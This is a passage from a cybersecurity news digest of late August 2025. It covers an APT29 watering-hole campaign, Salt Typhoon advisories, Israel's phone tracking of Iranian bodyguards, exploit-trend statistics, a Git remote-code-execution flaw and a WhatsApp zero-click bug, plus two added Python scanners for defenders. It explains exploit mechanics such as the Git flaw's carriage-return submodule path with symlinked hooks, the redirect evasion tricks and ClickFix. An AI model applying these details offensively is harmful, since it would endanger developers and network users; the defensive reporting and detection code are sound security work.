OpenAI has steadfastly rejected the publishers' request on grounds of protecting user privacy and has, more recently, begun trying to limit the amount of user chats it has to give the plaintiffs. Last month, the company's CEO Sam Altman admitted during an appearance on a podcast that using ChatGPT as a therapist or attorney doesn't confer the same confidentiality that talking to a flesh-and-blood professional would — and that thanks to the NYT lawsuit, the company may be forced to turn those chats over to courts. In other words, OpenAI is stuck between a rock and a hard place. The PR blowback from its users spiraling into mental health crises and dying by suicide is appalling — but since it's clearly having trouble controlling its own tech enough to protect users from those harmful scenarios, it's falling back on heavy-handed moderation that flies in the face of its own CEO's promises.
Amazon disrupts watering hole campaign by Russia’s APT29
aws.amazon.com by CJ Moses on 29 AUG 2025 Amazon’s threat intelligence team has identified and disrupted a watering hole campaign conducted by APT29 (also known as Midnight Blizzard), a threat actor associated with Russia’s Foreign Intelligence Service (SVR). Our investigation uncovered an opportunistic watering hole campaign using compromised websites to redirect visitors to malicious infrastructure designed to trick users into authorizing attacker-controlled devices through Microsoft’s device code authentication flow. This opportunistic approach illustrates APT29’s continued evolution in scaling their operations to cast a wider net in their intelligence collection efforts. The evolving tactics of APT29: This campaign follows a pattern of activity we’ve previously observed from APT29. In October 2024, Amazon disrupted APT29’s attempt to use domains impersonating AWS to phish users with Remote Desktop Protocol files pointed to actor-controlled resources. Also, in June 2025, Google’s Threat Intelligence Group reported on APT29’s phishing campaigns targeting academics and critics of Russia using application-specific passwords (ASPs). The current campaign shows their continued focus on credential harvesting and intelligence collection, with refinements to their technical approach, and demonstrates an evolution in APT29’s tradecraft through their ability to: compromise legitimate websites and initially inject obfuscated JavaScript; rapidly adapt infrastructure when faced with disruption; and, on new infrastructure, adjust from use of JavaScript redirects to server-side redirects. Technical details: Amazon identified the activity through an analytic it created for APT29 infrastructure, which led to the discovery of the actor-controlled domain names. Through further investigation, Amazon identified the actor compromised various legitimate websites and injected JavaScript that redirected approximately 10% of visitors to these actor-controlled domains. 
These domains, including findcloudflare[.]com, mimicked Cloudflare verification pages to appear legitimate. The campaign’s ultimate target was Microsoft’s device code authentication flow. There was no compromise of AWS systems, nor was there a direct impact observed on AWS services or infrastructure. Analysis of the code revealed evasion techniques, including: using randomization to only redirect a small percentage of visitors; employing base64 encoding to hide malicious code; setting cookies to prevent repeated redirects of the same visitor; and pivoting to new infrastructure when blocked. [Image: compromised page, with domain name removed.] Amazon’s disruption efforts: Amazon remains committed to protecting the security of the internet by actively hunting for and disrupting sophisticated threat actors. We will continue working with industry partners and the security community to share intelligence and mitigate threats. Upon discovering this campaign, Amazon worked quickly to isolate affected EC2 instances, partner with Cloudflare and other providers to disrupt the actor’s domains, and share relevant information with Microsoft. Despite the actor’s attempts to migrate to new infrastructure, including a move off AWS to another cloud provider, our team continued tracking and disrupting their operations. After our intervention, we observed the actor register additional domains such as cloudflare[.]redirectpartners[.]com, which again attempted to lure victims into Microsoft device code authentication workflows. Protecting users and organizations: We recommend organizations implement the following protective measures. For end users: Be vigilant for suspicious redirect chains, particularly those masquerading as security verification pages. Always verify the authenticity of device authorization requests before approving them. 
Enable multi-factor authentication (MFA) on all accounts, similar to how AWS now requires MFA for root accounts. Be wary of web pages asking you to copy and paste commands or perform actions in the Windows Run dialog (Win+R). This matches the recently documented “ClickFix” technique where attackers trick users into running malicious commands. For IT administrators: Follow Microsoft’s security guidance on device authentication flows and consider disabling this feature if not required. Enforce conditional access policies that restrict authentication based on device compliance, location, and risk factors. Implement robust logging and monitoring for authentication events, particularly those involving new device authorizations. Indicators of compromise (IOCs): findcloudflare[.]com and cloudflare[.]redirectpartners[.]com. Sample JavaScript code: [Image: decoded JavaScript code, with compromised site removed: “[removed_domain]”]
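A site owner can check their own pages for the evasion traits the post lists (a random gate, base64-hidden code, a cookie that suppresses repeat redirects, a redirect to a host the site does not use). The Python below is an added example, not code from Amazon or the original post; the sample page, the hosts `www.shop.example` and `verify-check.example`, and all function names are constructed for illustration.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# IOC domains as the post lists them (defanged); refanged here only for matching.
IOCS = {d.replace("[.]", ".") for d in
        ("findcloudflare[.]com", "cloudflare[.]redirectpartners[.]com")}

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long base64-looking literals
URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)
TRAITS = {  # the evasion traits the post describes, as they appear in script text
    "random_gate": re.compile(r"Math\.random\s*\("),
    "cookie_write": re.compile(r"document\.cookie\s*=(?!=)"),
    "redirect": re.compile(
        r"location(?:\.href)?\s*=(?!=)|location\.(?:replace|assign)\s*\("),
}


class InlineScripts(HTMLParser):
    """Collect the bodies of <script> elements that have no src attribute."""

    def __init__(self):
        super().__init__()
        self.scripts, self._in_inline = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script" and "src" not in dict(attrs):
            self._in_inline = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False

    def handle_data(self, data):
        if self._in_inline:
            self.scripts[-1] += data


def decoded_blobs(js):
    """Return readable text recovered from base64 runs in js (one layer only)."""
    out = []
    for run in B64_RUN.findall(js):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            text = raw.decode("utf-8")
        except ValueError:  # bad padding, bad alphabet, or not UTF-8
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text):
            out.append(text)
    return out


def is_ioc(host):
    """True if host is one of the listed IOC domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in IOCS)


def _host(url):
    try:
        return urlparse(url).hostname or ""
    except ValueError:
        return ""


def scan_page(html, allowed_hosts):
    """Flag inline scripts that redirect to, or reference, unapproved hosts."""
    parser = InlineScripts()
    parser.feed(html)
    findings = []
    for idx, js in enumerate(parser.scripts):
        # Inspect the script as written and each decoded base64 literal inside it.
        views = [(False, js)] + [(True, t) for t in decoded_blobs(js)]
        for encoded, text in views:
            traits = sorted(n for n, rx in TRAITS.items() if rx.search(text))
            hosts = {_host(u) for u in URL.findall(text)}
            foreign = sorted(h for h in hosts if h and h not in allowed_hosts)
            hits = [h for h in foreign if is_ioc(h)]
            if hits or ("redirect" in traits and foreign):
                findings.append({"script": idx, "encoded": encoded,
                                 "traits": traits, "foreign_hosts": foreign,
                                 "ioc_hits": hits})
    return findings


# Constructed sample: the second inline script carries a gated redirect as base64.
# "verify-check.example" is a placeholder host, not an indicator from the post.
_HIDDEN = ("if(Math.random()<0.1&&document.cookie.indexOf('seen=1')<0){"
           "document.cookie='seen=1';location.href='https://verify-check.example/';}")
SAMPLE_TAMPERED = (
    "<html><head><script src='https://www.shop.example/app.js'></script>"
    "<script>location.href='https://www.shop.example/home';</script>"
    "<script>var p='" + base64.b64encode(_HIDDEN.encode()).decode() + "';"
    "/* loader elided */</script></head><body>ok</body></html>"
)
ALLOWED = {"www.shop.example"}

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_TAMPERED, ALLOWED):
        print(finding)
```

Only one layer of base64 is decoded and external script files are not fetched, so a clean result here does not clear a page; compare against a known-good copy of the site as well.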
UK and allies expose China-based technology companies for enabling global cyber campaign against critical networks
ncsc.gov.uk The NCSC and international partners share technical details of malicious activities and urge organisations to take mitigative actions. GCHQ’s National Cyber Security Centre and international partners link three China-based companies to campaign targeting foreign governments and critical networks. Commercial cyber ecosystem with links to the Chinese intelligence services has enabled global malicious activity. New advisory supports UK organisations in critical sectors bolster their security against China state-sponsored cyber activity. Network defenders urged to proactively hunt for activity and take steps to mitigate threat from attackers exploiting avoidable weaknesses. The UK and international allies have today (Wednesday) publicly linked three technology companies based in China with a global malicious cyber campaign targeting critical networks. In a new advisory published today, the National Cyber Security Centre (NCSC) – a part of GCHQ – and international partners from twelve other countries have shared technical details about how malicious cyber activities linked with these China-based commercial entities have targeted nationally significant organisations around the world. Since at least 2021, this activity has targeted organisations in critical sectors including government, telecommunications, transportation, lodging, and military infrastructure globally, with a cluster of activity observed in the UK. The activities described in the advisory partially overlap with campaigns previously reported by the cyber security industry most commonly under the name Salt Typhoon. The data stolen through this activity can ultimately provide the Chinese intelligence services the capability to identify and track targets’ communications and movements worldwide. 
The advisory describes how the threat actors have had considerable success taking advantage of known common vulnerabilities rather than relying on bespoke malware or zero-day vulnerabilities to carry out their activities, meaning attacks via these vectors could have been avoided with timely patching. Organisations of national significance in the UK are encouraged to proactively hunt for malicious activity and implement mitigative actions, including ensuring that edge devices are not exposed to known vulnerabilities and implementing security updates. NCSC Chief Executive Dr Richard Horne said: “We are deeply concerned by the irresponsible behaviour of the named commercial entities based in China that has enabled an unrestrained campaign of malicious cyber activities on a global scale. “It is crucial organisations in targeted critical sectors heed this international warning about the threat posed by cyber actors who have been exploiting publicly known – and so therefore fixable – vulnerabilities. “In the face of sophisticated threats, network defenders must proactively hunt for malicious activity, as well as apply recommended mitigations based on indicators of compromise and regularly reviewing network device logs for signs of unusual activity.” The UK has led globally in helping to improve cyber risk management with leading legislation including the Telecommunications (Security) Act 2021 and the associated Code of Practice, for which the NCSC was the technical authority. The government's forthcoming Cyber Security and Resilience Bill will further strengthen the UK’s cyber defences, protecting the services the public rely on to go about their normal lives. The NCSC and government partners have previously warned about the growing range of cyber threats facing critical sectors and provide a range of guidance and resources to improve resilience. 
The NCSC's Early Warning service provides timely notifications about potential security issues, including known vulnerabilities, and malicious activities affecting users’ networks. All UK organisations can sign up to this free service. The three China-based technology companies provide cyber-related services to the Chinese intelligence services and are part of a wider commercial ecosystem in China, which includes information security companies, data brokers and hackers for hire. The named entities are: Sichuan Juxinhe Network Technology Co Ltd, Beijing Huanyu Tianqiong Information Technology Co, and Sichuan Zhixin Ruijie Network Technology Co Ltd. The NCSC has co-sealed this advisory alongside agencies from the United States, Australia, Canada, New Zealand, Czech Republic, Finland, Germany, Italy, Japan, the Netherlands, Poland and Spain.
Targeting Iran’s Leaders, Israel Found a Weak Link: Their Bodyguards
nytimes.com By Farnaz Fassihi, Ronen Bergman and Mark Mazzetti 2025/08/30 Israel was able to track the movements of key Iranian figures and assassinate them during the 12-day war this spring by following the cellphones carried by members of their security forces. The meeting was so secret that only the attendees, a handful of top Iranian government officials and military commanders, knew the time and location. It was June 16, the fourth day of Iran’s war with Israel, and Iran’s Supreme National Security Council gathered for an emergency meeting in a bunker 100 feet below a mountain slope in the western part of Tehran. For days, a relentless Israeli bombing campaign had destroyed military, government and nuclear sites around Iran, and had decimated the top echelon of Iran’s military commanders and nuclear scientists. The officials, who included President Masoud Pezeshkian, the heads of the judiciary and the intelligence ministry and senior military commanders, arrived in separate cars. None of them carried mobile phones, knowing that Israeli intelligence could track them. Despite all the precautions, Israeli jets dropped six bombs on top of the bunker soon after the meeting began, targeting the two entrance and exit doors. Remarkably, nobody in the bunker was killed. When the leaders later made their way out of the bunker, they found the bodies of a few guards, killed by the blasts. The attack threw Iran’s intelligence apparatus into a tailspin, and soon enough Iranian officials discovered a devastating security lapse: The Israelis had been led to the meeting by hacking the phones of bodyguards who had accompanied the Iranian leaders to the site and waited outside. Israel’s tracking of the guards has not been previously reported. It was one part of a larger effort to penetrate the most tightly guarded circles of Iran’s security and intelligence apparatus that has had officials in Tehran chasing shadows for two months. 
According to Iranian and Israeli officials, Iranian security guards’ careless use of mobile phones over several years — including posting on social media — played a central role in allowing Israeli military intelligence to hunt Iranian nuclear scientists and military commanders and the Israeli Air Force to swoop in and kill them with missiles and bombs during the first week of the June war. “We know senior officials and commanders did not carry phones, but their interlocutors, security guards and drivers had phones; they did not take precautions seriously, and this is how most of them were traced,” said Sasan Karimi, who previously served as the deputy vice president for strategy in Iran’s current government and is now a political analyst and lecturer at Tehran University. The account of Israel’s strike on the meeting, and the details of how it tracked and targeted Iranian officials and commanders, is based on interviews with five senior Iranian officials, two members of the Islamic Revolutionary Guards Corps and nine Israeli military and intelligence officials. The security breakdowns with the bodyguards are just one component of what Iranian officials acknowledge has been a long-running and often successful effort by Israel to use spies and operatives placed around the country as well as technology against Iran, sometimes with devastating effect. Following the most recent conflict, Iran remains focused on hunting down operatives that it fears remain present in the country and the government. “Infiltration has reached the highest echelons of our decision making,” Mostafa Hashemi Taba, a former vice president and minister, said in an interview with Iranian media in late June. This month Iran executed a nuclear scientist, Roozbeh Vadi, on allegations of spying for Israel and facilitating the assassination of another scientist. 
Three senior Iranian officials and a member of the Revolutionary Guards said Iran had quietly arrested or placed under house arrest dozens of people from the military, intelligence and government branches who were suspected of spying for Israel, some of them high-ranking. Israel has neither confirmed nor denied a connection to those so accused. Spy games between Iran and Israel have been a constant feature of a decades-long shadow war between the two countries, and Israel’s success in June in killing so many important Iranian security figures shows just how much Israel has gained the upper hand. [Photo caption: President Masoud Pezeshkian of Iran attending a protest in Tehran on June 22, following the U.S. attacks on nuclear sites in Iran. Mr. Pezeshkian himself escaped an attack on a bunker on June 16. Credit: Arash Khamooshi for The New York Times.] Israel had been tracking senior Iranian nuclear scientists since the end of 2022 and had weighed killing them as early as last October but held off to avoid a clash with the Biden administration, Israeli officials said. From the end of last year until June, what the Israelis called a “decapitation team” reviewed the files of all the scientists in the Iranian nuclear project known to Israel, to decide which they would recommend to kill. The first list contained 400 names. That was reduced to 100, mainly based on material from an Iranian nuclear archive that the Mossad, the Israeli intelligence agency, had stolen from Iran in 2018. In the end, Iran said the Israelis focused on and killed 13 scientists. At the same time, Israel was building its capacity to target and kill senior Iranian military officials under a program called “Operation Red Wedding,” a play on a bloody “Game of Thrones” episode. Brig. Gen. Amir Ali Hajizadeh, the commander of the Revolutionary Guards’ Aerospace Force, was the first target, one Israeli official said. 
Ultimately, Israeli officials said, the basic idea in both operations was to locate 20 to 25 human targets in Iran and hit all of them in the opening strike of the campaign, on the assumption that they would be more careful afterward, making them much harder to hit. In a video interview with an Iranian journalist, the newly appointed head of the Revolutionary Guards Corps, Brig. Gen. Ahmad Vahidi, said that although Israel had human operatives and spies in the country, it had tracked senior officials and scientists and discovered the location of sensitive meetings mostly through advanced technology. “The enemy gets the majority of its intelligence through technology, satellites and electronic data,” General Vahidi said. “They can find people, get information, their voices, images and zoom in with precise satellites and find the locations.” From the Israeli side, Iran’s growing awareness of the threat to senior figures came to be seen as an opportunity. Fearing more assassinations on the ground of the sort that Israel had pulled off successfully in the past, the supreme Iranian leader, Ayatollah Ali Khamenei, ordered extensive security measures including large contingents of bodyguards and warned against the use of mobile phones and messaging apps like WhatsApp, which is commonly used in Iran. Those bodyguards, Israel discovered, were not only carrying cellphones but even posting from them on social media. “Using so many bodyguards is a weakness that we imposed on them, and we were able to take advantage of that,” one Israeli defense official said. Iranian officials had long suspected that Israel was tracking the movements of senior military commanders and nuclear scientists through their mobile phones. Last year, after Israel detonated bombs hidden inside thousands of pagers carried by Hezbollah operatives in Lebanon, Iran banned many of its officials in particularly sensitive jobs from using smartphones, social media and messaging apps. 
Smartphones are now completely off limits for senior military commanders, nuclear scientists and government officials. The protection of senior officials, military commanders and nuclear scientists is the responsibility of an elite brigade within the Revolutionary Guards called Ansar al-Mehdi. The commander in chief of Ansar, appointed last August after the new government came into office, is Gen. Mohamad Javad Assadi, one of the youngest senior commanders in the Guards. General Assadi had personally warned several senior commanders and a top nuclear scientist, Mohammad Mehdi Tehranchi, that Israel was planning to assassinate them at least a month before they were killed on the first day of the war, according to two senior Iranian officials with knowledge of the conversation. He had also called a meeting with the team leaders of security details asking them to take extra precautions, the officials said. The cellphone ban initially did not extend to the security guards protecting the officials, scientists and commanders. That changed after Israel’s wave of assassinations on the first day of the war. Guards are now supposed to carry only walkie-talkies. Only team leaders who do not travel with the officials can carry cellphones. But despite the new rules, according to officials who have held meetings with General Assadi about security, someone violated them and carried a phone to the National Security Council meeting, allowing the Israelis to carry out the pinpoint strike. Hamzeh Safavi, a political and military analyst whose father is the top military adviser to Ayatollah Khamenei, said that Israel’s technological superiority over Iran was an existential threat. He said Iran had no choice but to conduct a security shakedown, overhaul its protocols and make difficult decisions — including arrests and prosecution of high-level spies. 
“We must do whatever it takes to identify and address this threat; we have a major security and intelligence bug and nothing is more urgent than repairing this hole,” Mr. Safavi said in a telephone interview. Iran’s minister of intelligence said in a statement this month that it had foiled an Israeli assassination attempt on 23 senior officials...
State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine
infosecurity-magazine James Coker Deputy Editor, Infosecurity Magazine 29 Aug 2025
Recorded Future highlighted the vast capabilities of state actors to rapidly weaponize newly disclosed vulnerabilities for geopolitical purposes.
The majority (53%) of attributed vulnerability exploits in the first half of 2025 were conducted by state-sponsored actors for strategic, geopolitical purposes, according to a new report by Recorded Future’s Insikt Group. The researchers said the findings demonstrate the growing ability of well-resourced state-sponsored groups to weaponize flaws rapidly following disclosure. Geopolitical purposes, such as espionage and surveillance, are the key motives for these threat actors. “The significant state-sponsored involvement also implies that these threats are not just random or opportunistic but often targeted and persistent campaigns aiming at specific sectors or high-value systems,” they noted.
The majority of state-sponsored campaigns were conducted by Chinese state-sponsored actors. These groups primarily targeted edge infrastructure and enterprise solutions, a tactic that has continued since 2024. The suspected China-linked group UNC5221 exploited the highest number of vulnerabilities in H1 2025. It demonstrated a preference for Ivanti products, including Endpoint Manager Mobile, Connect Secure and Policy Secure.
Financially motivated groups accounted for the remaining 47% of vulnerability exploits: 27% came from actors involved in theft and fraud but not linked to ransomware, and 20% were attributed to ransomware and extortion groups. The researchers predicted that the exploitation of edge security appliances, remote access tools and other gateway-layer software will remain a top priority for both state-sponsored and financially motivated groups. “The strategic value of these systems – acting as intermediaries for encrypted traffic and privileged access – makes them high-reward targets,” they noted. Microsoft was the most targeted vendor, with the tech giant’s products accounting for 17% of exploitations.
Most Vulnerability Exploits Required No Authentication
Insikt Group’s H1 2025 Malware and Vulnerability Trends report, published on August 28, found that the total number of disclosed common vulnerabilities and exposures (CVEs) grew 16% year-over-year. Attackers exploited 161 distinct vulnerabilities in the six-month period, up from 136 in H1 2024. Of the 161 flaws, 69% required no authentication to exploit, while 48% could be exploited remotely over a network. “This heavy tilt toward unauthenticated, remote exploits means that attacks can be launched directly from the internet against vulnerable hosts, with no credentials or insider access needed,” the researchers commented. Additionally, 30% of the exploited CVEs enabled remote code execution (RCE), which often grants an attacker full control over the target system.
ClickFix Becomes a Favored Initial Access Technique
The report observed that ransomware actors adopted new initial access techniques in H1 2025. This included a significant increase in ClickFix social engineering attacks. ClickFix involves the use of a fake error or verification message to manipulate victims into copying and pasting a malicious script and then running it. The tactic preys on users’ desire to fix problems themselves rather than alerting their IT team or anyone else. Therefore, it is effective at bypassing security protections as the victim infects themselves. The Interlock gang was observed using ClickFix in campaigns in January and February 2025. The group has also leveraged FileFix in later attacks. This tactic is an evolution of ClickFix, in which users are tricked into pasting a malicious file path into the Windows File Explorer address bar rather than using a dialog box.
Insikt Group assesses that the success of ClickFix means this method will remain a favored initial access technique through the rest of 2025 unless widespread mitigations reduce its effectiveness. Post-compromise, ransomware groups have increased their use of endpoint detection and response (EDR) evasion via bring-your-own-installer (BYOI) techniques, and custom payloads using just-in-time (JIT) hooking and memory injection to bypass detection.
Chinese hack group targets Dutch internet providers, intelligence agencies confirm | NL Times
nltimes.nl/ Thursday, 28 August 2025 - 12:50 - Dutch intelligence agencies confirmed on Thursday that the country was targeted in the global cyberespionage campaign carried out by the Chinese state-linked hacker group Salt Typhoon. The campaign, which came to light in late 2024, focused on the international telecommunications sector. The Dutch Military Intelligence and Security Service (MIVD) and the General Intelligence and Security Service (AIVD) said they independently verified portions of a U.S. investigation attributing the campaign to Salt Typhoon. “We can confirm parts of the U.S. findings through our own intelligence,” the agencies stated. The warning aligns with alerts issued by the U.S. National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI), as well as European intelligence services including Germany’s BND, Finland’s SUPO, the U.K.’s NCSC, and Italy’s AISE. In the Netherlands, the targets were smaller Internet service and hosting providers rather than the major telecom operators. Investigations by the MIVD and AIVD indicate that the hackers gained access to routers of Dutch targets but, as far as is known, did not penetrate internal networks further. Where possible, the agencies and the National Cyber Security Centre (NCSC) shared threat information with affected organizations. The agencies emphasized that China’s cyber activities have become increasingly sophisticated. “These activities are now so advanced that continuous effort and attention are needed to detect and counter cyber operations against Dutch interests,” the MIVD and AIVD said. They added that while proactive measures can reduce risk, complete prevention is not possible, posing a significant challenge to national cyber resilience
www.root.io Root Security Bulletin
CVE: CVE-2025-48384
Date: August 26, 2025
Severity: High (CVSS v3.1 Score: 8.0)
Overview
A critical Git vulnerability, CVE-2025-48384, has been identified and is actively exploited in the wild, now listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. This flaw enables remote code execution (RCE) through malicious repositories and poses a significant risk to developers and CI/CD pipelines across Linux and macOS systems. Windows installations are unaffected due to filesystem restrictions. The vulnerability impacts all Git versions prior to the patched releases issued on July 8, 2025. While Ubuntu responded immediately with security advisories, Debian has marked the issue "no-dsa," delaying fixes until future point releases—leaving many Debian-based environments exposed.
Technical Details
The vulnerability arises from an inconsistency in Git's configuration parsing logic:
- When reading config values, Git strips trailing CRLF characters.
- When writing, values with trailing carriage returns (CR) are not properly quoted, leading to discrepancies when read back.
Attackers can exploit this by creating malicious .gitmodules files with submodule paths ending in CR characters. When combined with symlinked hooks directories and executable post-checkout hooks, this enables arbitrary file writes and ultimately remote code execution.
Exploitation scenario: Victims running git clone --recursive on a malicious repository may initialize submodules in unintended filesystem locations. Security researchers (liamg, acheong08, and others) have published proof-of-concept exploits validating the attack's real-world impact.
Affected versions: Git versions prior to v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1
Systems: Linux, macOS (where control characters are allowed in filenames)
Not affected: Windows
CVSS v3.1 Vector: AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H
Base Score: 8.0 (High)
Impact
- Active exploitation confirmed: CISA added CVE-2025-48384 to its KEV catalog on August 25, 2025, with a remediation deadline of September 15, 2025 for U.S. federal agencies.
- Developer tools at risk: GitHub Desktop for macOS is particularly vulnerable due to its default use of recursive cloning.
- Distribution disparity: Ubuntu issued immediate advisories and patches, while Debian deferred remediation, leaving production systems running Bookworm, Bullseye, or Trixie without timely fixes.
This uneven patching cadence underscores the supply chain risks when critical open-source infrastructure receives inconsistent remediation across ecosystems.
Timeline
- July 8, 2025: Git project discloses CVE-2025-48384 and issues patched releases across eight version branches.
- July 9-15, 2025: Security researchers publish multiple proof-of-concept exploits, confirming real-world exploitability.
- August 8, 2025: Root tested, backported, and deployed patches for Debian Bookworm, Bullseye, Trixie, and all Slim variants, delivering them seamlessly across all Root users' environments without disruption.
- August 15, 2025: Debian marked the issue as "no-dsa," opting for remediation only in future point releases.
- August 25, 2025: CISA added CVE-2025-48384 to the KEV catalog, mandating U.S. federal agencies remediate by September 15.
Recommendations
For Debian Users
- Confirm exposure: Determine if your systems use the git package maintained by Debian. Tools like Trivy or enterprise vulnerability scanners can quickly verify vulnerable versions.
- Short-term mitigations: Avoid git clone --recursive on untrusted repositories. Inspect .gitmodules files before initializing submodules. Consider compiling patched versions of Git from source where feasible.
For Root Users
Customers using Root's Agentic Vulnerability Remediation (AVR) platform are already protected. Root delivered patched and backported Git packages on August 8, 2025, covering Debian Bookworm, Bullseye, Trixie, and all Slim variants. Patches were deployed seamlessly across all user environments without disruption. Users can verify their protection in the Artifact Explorer or trigger an on-demand remediation in under five minutes.
Extended availability: Root's patched versions are also accessible through partners such as Aikido and scanners using Trivy, where advanced tier subscribers receive immediate coverage.
For Non-Customers
Get free remediation: Sign up at app.root.io to remediate affected images and push them back to your repositories at no cost.
Root's Approach
Root’s Agentic Vulnerability Remediation (AVR) technology leverages AI-driven automation overseen by security experts, replicating the decision-making of seasoned engineers at scale. The platform operates in five phases:
- Assessment – Mapping CVEs across known databases.
- Recommendation – Identifying the optimal remediation path.
- Application – Applying and backporting security patches where needed.
- Validation – Rigorous testing against public frameworks.
- Deployment – Delivering fully remediated, auditable images.
Unlike traditional vulnerability scanners, Root fixes vulnerabilities proactively—eliminating false positives, providing comprehensive SBOMs and VEX statements, and reducing remediation time to minutes.
Conclusion
CVE-2025-48384 highlights both the responsiveness of the Git project and the uneven patching practices across Linux distributions. While upstream patches were released promptly, Debian's deferred remediation created a critical exposure window that attackers are already exploiting. Organizations relying on Debian-based containers cannot afford to wait for delayed point releases. Automated remediation platforms like Root AVR bridge this gap by providing continuous, proactive protection at container-build speeds—ensuring development teams remain secure without sacrificing velocity.
For broader industry analysis of what this vulnerability reveals about modern security approaches, see our blog post: CVE-2025-48384: The Git Vulnerability That's Exposing a Broken System.
Take action now: Explore Root's remediation for CVE-2025-48384 at app.root.io
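The two checks the bulletin recommends (confirm the Git version, inspect .gitmodules before initializing submodules) can be scripted as below. This is an added example, not code from Git or Root; the function names and the sample .gitmodules contents are constructed for illustration, and the scanner is a heuristic rather than Git's own config parser.

```python
"""Pre-clone triage for CVE-2025-48384 (added example, not Git's or Root's code)."""
import re

# First fixed release on each maintenance branch, as listed in the bulletin.
PATCHED = {(2, 43): 7, (2, 44): 4, (2, 45): 4, (2, 46): 4,
           (2, 47): 3, (2, 48): 2, (2, 49): 1, (2, 50): 1}

SECTION = re.compile(rb'^[ \t]*\[\s*submodule\s+"((?:[^"\\]|\\.)*)"\s*\]')
KEYVAL = re.compile(rb'^[ \t]*([A-Za-z][A-Za-z0-9-]*)[ \t]*=[ \t]*(.*)$')


def upstream_version_is_patched(version_output):
    """Judge `git --version` output by its upstream version number only.

    Distribution backports keep an older upstream number, so False on a
    Debian or Ubuntu package means "check the package changelog", not
    "definitely vulnerable".
    """
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_output)
    if not m:
        raise ValueError(f"no version number in {version_output!r}")
    major, minor, patch = map(int, m.groups())
    branch = (major, minor)
    if branch in PATCHED:
        return patch >= PATCHED[branch]
    # Branches older than 2.43 have no fixed release listed; newer ones ship the fix.
    return branch > max(PATCHED)


def suspicious_submodule_values(gitmodules):
    """Return (line_no, submodule, key, control_bytes) for values to distrust.

    A CR that ends a line is an ordinary CRLF line ending and is ignored.
    A CR (or any other control byte) that survives inside the value, for
    example inside double quotes, is what the bulletin describes.
    """
    findings = []
    current = None
    for line_no, raw in enumerate(gitmodules.split(b"\n"), start=1):
        line = raw[:-1] if raw.endswith(b"\r") else raw
        section = SECTION.match(line)
        if section:
            current = section.group(1).decode("utf-8", "replace")
            continue
        keyval = KEYVAL.match(line)
        if keyval is None or current is None:
            continue
        key = keyval.group(1).decode("ascii").lower()
        value = keyval.group(2)
        control = [f"0x{b:02x}" for b in sorted(set(value))
                   if (b < 0x20 and b != 0x09) or b == 0x7F]
        if control:
            findings.append((line_no, current, key, control))
    return findings


# Constructed inputs: a benign file checked out with CRLF line endings, and a
# file whose quoted submodule path ends in a carriage return.
CRLF_CHECKOUT = (b'[submodule "docs"]\r\n'
                 b'\tpath = docs\r\n'
                 b'\turl = https://example.invalid/docs.git\r\n')
CR_IN_PATH = (b'[submodule "lib"]\n'
              b'\tpath = "lib\r"\n'
              b'\turl = https://example.invalid/lib.git\n')

if __name__ == "__main__":
    for label, blob in (("crlf checkout", CRLF_CHECKOUT), ("cr in path", CR_IN_PATH)):
        print(label, suspicious_submodule_values(blob))
    print("2.47.2 patched upstream:", upstream_version_is_patched("git version 2.47.2"))
```

Run the scanner on the raw bytes of .gitmodules from a non-recursive clone, before any `git submodule update --init`.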
WhatsApp fixes 'zero-click' bug used to hack Apple users with spyware | TechCrunch
techcrunch.com Zack Whittaker 11:15 AM PDT · August 29, 2025 A spyware vendor was behind a recent campaign that abused a vulnerability in WhatsApp to deliver an exploit capable of hacking into iPhones and Macs. WhatsApp said on Friday that it fixed a security bug in its iOS and Mac apps that was being used to stealthily hack into the Apple devices of “specific targeted users.” The Meta-owned messaging app giant said in its security advisory that it fixed the vulnerability, known officially as CVE-2025-55177, which was used alongside a separate flaw found in iOS and Macs, which Apple fixed last week and tracks as CVE-2025-43300. Apple said at the time that the flaw was used in an “extremely sophisticated attack against specific targeted individuals.” Now we know that dozens of WhatsApp users were targeted with this pair of flaws. Donncha Ó Cearbhaill, who heads Amnesty International’s Security Lab, described the attack in a post on X as an “advanced spyware campaign” that targeted users over the past 90 days, or since the end of May. Ó Cearbhaill described the pair of bugs as a “zero-click” attack, meaning it does not require any interaction from the victim, such as clicking a link, to compromise their device. The two bugs chained together allow an attacker to deliver a malicious exploit through WhatsApp that’s capable of stealing data from the user’s Apple device. Per Ó Cearbhaill, who posted a copy of the threat notification that WhatsApp sent to affected users, the attack was able to “compromise your device and the data it contains, including messages.” It’s not immediately clear who, or which spyware vendor, is behind the attacks. When reached by TechCrunch, Meta spokesperson Margarita Franklin confirmed the company detected and patched the flaw “a few weeks ago” and that the company sent “less than 200” notifications to affected WhatsApp users. 
The spokesperson did not say, when asked, if WhatsApp has evidence to attribute the hacks to a specific attacker or surveillance vendor. This is not the first time that WhatsApp users have been targeted by government spyware, a kind of malware capable of breaking into fully patched devices with vulnerabilities not known to the vendor, known as zero-day flaws. In May, a U.S. court ordered spyware maker NSO Group to pay WhatsApp $167 million in damages for a 2019 hacking campaign that broke into the devices of more than 1,400 WhatsApp users with an exploit capable of planting NSO’s Pegasus spyware. WhatsApp brought the legal case against NSO, citing a breach of federal and state hacking laws, as well as its own terms of service. Earlier this year, WhatsApp disrupted a spyware campaign that targeted around 90 users, including journalists and members of civil society across Italy. The Italian government denied its involvement in the spying campaign. Paragon, whose spyware was used in the campaign, later cut off Italy from its hacking tools for failing to investigate the abuse.
Insurers May Limit Payments in Cases of Unpatched CVEs
